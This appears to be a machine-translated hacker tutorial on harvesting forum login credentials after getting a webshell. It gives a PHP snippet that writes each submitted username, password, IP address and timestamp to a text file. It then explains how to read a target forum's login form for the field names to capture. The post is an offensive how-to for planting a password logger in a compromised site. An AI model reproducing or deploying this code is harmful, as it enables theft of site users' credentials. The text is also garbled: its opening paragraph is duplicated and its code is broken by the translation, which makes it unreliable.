After obtaining webshell, it is difficult to crack the password for further penetration, such as discuz, instead of using md5 encryption directly. I used to write it for big data once. I wrote it again yesterday when the big brother pig was easy to use. The code is relatively simple. In a few words, I will explain the principle in detail and take care of some friends who do not know much about php.
After obtaining webshell, it is difficult to crack the password for further penetration, such as discuz, instead of using md5 encryption directly. I used to write it for big data once. I wrote it again yesterday when the big brother pig was easy to use. The code is relatively simple. In just a few words, I will elaborate on the principle and take care ofPhpI don't know anyone.
If ($ _ POST [loginSuBmit]! =) {// Determine whether the login button is clicked
$ Sb = user:. $ _ POST [username]. --Passwd:. $ _ POST [password]. -- ip:. $ HTTP_SERVER_VARS [REMOTE_ADDR]. --.Date(Y-m-d H: I: s). rn; // concatenate the value received by POST and assign it to the variable $ sb.
FWrite(Fopen(robot.txt, AB), $ sb);} // write the result into a file
The following is a brief analysis. The login page of China is used as an example. OpenBbs.77169.com/login.php right-click to view the source code, CTRL + F search for action to find the login form.
I only copied the key code.
RmAction = login. php? Method = post name = login onSubmit = this. submit. disabl Ed= TrUe;> // The value after the action is the address submitted by the form, which will process login. For example, if the method to determine whether the password is correct or not is POST, it is received using $ _ POST.
.... Powerful ellipsis ......
Account (U):
Class = inputId= Pwuser accessKey = u size = 16
Name = pwuser>// Input box of the user name. Note that the value of the user name corresponds to $ _ POST [username]. To intercept the Chinese password, change it to $ _ POST [pwuser].
Password (P):
Class = input id = pwPwdAccessKey = p
Type = password size = 16 name = pwpwd>// Input box of the user name. Note that the value of the user name corresponds to $ _ POST [username]. To intercept the Chinese password, change it to $ _ POST [pwpwd].